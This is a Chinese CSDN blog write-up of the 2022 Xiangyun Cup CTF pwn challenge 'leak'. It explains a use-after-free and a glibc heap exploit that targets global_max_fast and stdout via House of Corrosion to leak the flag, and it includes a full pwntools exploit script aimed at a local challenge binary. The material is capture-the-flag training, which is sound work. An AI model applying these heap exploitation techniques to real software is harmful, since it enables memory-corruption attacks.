祥云杯2022 pwn - leak

最新推荐文章于 2023-02-21 22:38:52 发布
最新推荐文章于 2023-02-21 22:38:52 发布
阅读量414 收藏
点赞数 1
分类专栏: wp 文章标签: c++ 开发语言 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/127757201
版权

祥云杯2022 pwn - leak

当时比赛没有做出来,光顾着泄露libc地址去了。赛后看了wjh的师傅exp后,及其后悔之前没有做VN2022的HideOnHeap
在这里插入图片描述
首先会将flag读入堆地址中,没有show函数,笔者当时就是想方设法的去泄露libc,但没考虑到直接泄露flag
在这里插入图片描述
漏洞点一个uaf
wjh师傅的思路是利用botcake的方法,将unsortedbin和tcache重叠,使得unsortedbin的fd落到tcache的fd,再修改最后两字节,进行libc上地址的申请,可以申请到global_max_fast和stdout,这里由于地址随机化肯定是需要爆破的
申请到global_max_fast的原因是为了使得fastbinsY的溢出,再利用House-of-Corrosion使得stdout的_IO_write_base和_IO_write_ptr写入堆地址,具体的可以看这位师傅
在这里插入图片描述
算好size之后,delete掉,此时目标地址就会指向堆地址,从而实现了向地址中写入堆地址,因为flag在堆地址里,所以就可以泄露出flag,exp就用的wjh师傅的
在这里插入图片描述

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './leak'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

context.terminal = ['tmux','splitw','-h']

debug = 0
if debug:
    r = remote()
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

menu = 'Your choice: '

def add(index, size):
    r.sendlineafter(menu, '1')
    r.sendlineafter('Index: ', str(index))
    r.sendlineafter('Size: ', str(size))

def edit(index, content):
    r.sendlineafter(menu, '2')
    r.sendlineafter('Index: ', str(index))
    r.sendafter('Content: ', content)

def delete(index):
    r.sendlineafter(menu, '3')
    r.sendlineafter('Index: ', str(index))

delta = 0xb30
size = (delta * 2) + 0x20
alloc_size = size - 0x10

add(0, alloc_size)
add(1, alloc_size + 0x10)
add(2, alloc_size + 0x20)

add(3, 0x80)
add(4, 0x80)
add(5, 0x80)

for i in range(8):
    edit(4, p64(0) * 2)
    delete(4)

delete(3)
# global_max_fast
edit(4, '\x40\xf9')

add(6, 0x80)
add(7, 0x80)
add(8, 0x110)

for i in range(3):
    edit(4, p64(0) * 2)
    delete(4)

edit(4, '\x60\xe7')

add(9, 0x80)
add(10, 0x80)   #stdout

edit(7, '\xff' * 8)

delete(0)
#delete(1)

edit(10, p64(0xfbad1800) + b'\x00' * 0x19)
r.sendlineafter(menu, '6')

r.interactive()
z1r0.
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 6
    评论
专栏目录
House of apple 一种新的glibc中IO攻击方法
pythonxxoo的博客
06-18 2911
目录* House of apple 一种新的glibc中IO攻击方法 + 前言 + 利用条件 + 利用原理 + 利用思路 - 思路一:修改线程变量 - 思路二:修改结构体 - 思路三:修改线程变量之 - 思路四:修改全局变量 + 例题分析 - 题目分析 - 利用过程 + 总结提出一种新的中利用思路,暂且命名为。众所周知,高版本逐渐移除了等等一众全局变量,中题对钩子的利用将逐渐成为过去式。而想要在高版本利用成功,基本上就离不开对结构体的伪造与流的攻击。之前很多师傅都提出了一些优秀的攻击方法,比如house
2024NKCTF-pwn
最新发布
03-25
2024NKCTF_pwn
CTF中的PWN——绕canary防护1(32bit 格式化字符串漏洞leak canary 栈溢出)
壊壊的诱惑你的博客
09-29 1185
前言: 金丝雀: canary就像哨兵一样,值由程序运行时随机产生。在函数返回之前,程序检测这个值以确认栈未被破坏,达到避免攻击的目的。程序会使用fs:x来进行保护,这个地址指向了一个我们无法看到的随机值,并且fs是一个由内核维护的结构。 如果金丝雀(canary)的值被修改了,栈溢出发生了,保存的指令指针可能也被修改了,因此不能安全返回,函数会调用__stack_chk_f...
[BUUCTF-pwn] shanghai2019_slient_note
weixin_52640415的博客
02-02 414
没有show,没开PIE,got表可写,估计就是控制got表。 只能add两个块,一个是0x28,另一个是0x208。BUU上给的是ubuntu18,没有次数限制,也不删指针明显的UAF。add时用的calloc 。 但是一是没有show,要得到libc需要控制got表,而add时用的calloc不仅会清残留还不用libc-2.27的tcache。这样如果用fastbin attack需要找一个0x3X的标记或者0x21X显示这两个都找不着。 于是想到用unlink,这个不需要标记然后控制指针区后就可
pwn】2022 杯 部分wp
woodwhale的博客
10-31 1182
2022 pwn 部分wp,有空复现别的题目
2022pwn
m0_63437215的博客
11-05 387
2022pwn
-WRITEUP-bad_cat战队
qq_44005305的博客
02-21 398
先监听后上传,就不会报500的错误了 此时再去submit sessions sessions id 执行拿到shell再 bash -i 2>&1 ,上传一个ew内网穿透(github.com/idlefire/ew…%25EF%25BC%258Cchmod%25E4%25B8%258B "https://github.com/idlefire/ew)%EF%BC%8Cchmod%E4%B8%8B") msf的upload shell执行 ./ew -s rssocks -d 82.157.25.143
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
强网杯2022 pwn 赛题解析.docx
12-18
【强网杯2022 Pwn赛题解析】 在网络安全竞赛“强网杯”中,Pwn类赛题往往考验参赛者对内存安全漏洞利用的理解和技术应用。本题涉及的是一道基于高版本glibc的House of Apple攻击,这是一种利用大型bin(large bin)...
网鼎杯2022白虎组题目分享
09-06
逆向,pwn,misc,加解密题目,网鼎杯2022,白虎组,ctf
开关电源的PWN-PFM控制电路
12-09
开关电源的PWN-PFM控制电路 邹怀安 张 锐 胡荣强 武汉理工大学自动化学院 1.引言 开关电源由于在体积、重量、效率和可靠性等多多方面的优势,目前在计算机、通信、家用电器、雷达、空间技术等众多领域中已完全取代...
杯2022 writeup
渗透测试研究中心
11-02 1841
0x01 web1.ezjava下载源码对jar文件进行反编译,发现POST /myTest会出现反序列化漏洞util ,最后好像没用到检查程序,发现apache的common−collections4,而且其反序列化利用类未被Patch一眼看到 commons-collection4-4.0, 于是直接用 ysoserial 打考点发现就是cc4附上文章外加spring−ech网上有现成的...
2022---Crypto
Luiino的博客
11-08 451
暗示与费马定理有关。看p、q的生成过程,可以大概猜出pq是相近的,至于obfuscate里while循环里的内容看不太懂。用yafu工具试着分解一下n,就得到了。再用基础方法解rsa,得到m。由费马定理可以推出x = p-1,故把上面得到的m与。水平太烂,只能搞出来一道题。
[杯 2022] crypto部分
weixin_52640415的博客
11-03 1594
杯 2022 crypto部分 DLP 等
malloc源码分析(2)--常用的常量&&变量&&方法
azraelxuemo的博客
03-13 872
文章目录SIZE_SZDEFAULT_MXFASTget_max_fastMALLOC_ALIGN_MASKNBINSNSMALLBINSMIN_LARGE_SIZEin_smallbin_range 在glibc源码学习里面有时候会遇见一些#define ,当我们先大概知道一些会在调试的时候更轻松 [未完待续] SIZE_SZ 这个其实就是用来判断你当前运行环境是32位还是64位的,变化的长度 32位是4 64位是8 #define INTERNAL_SIZE_T size_t #define SIZE_
[杯 2022]ezjava
Sentiment的博客
11-04 1011
比赛中卡在了内存马上,了解完Controller和Interceptor内存马后,再来复现一下。
杯2022 pwn - bitheap
z1r0的博客
11-01 399
需要注意的是d60这个函数,经过调试之后可以得知传入的内容需要使用二进制来表示,所以就写了一个decode。2.27下的off-by-one,其实也可以看成off-by-null。接下来就是板子直接套 2.27的off-by-null。
《一个月冲刺杯》(1)PHP开发环境配置
m0_55400802的博客
10-13 778
🍀作者简介:被吉师散养、喜欢前端、学过后端、练过CTF、玩过DOS、不喜欢java的不知名学生。
攻防世界pwn-forgot
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值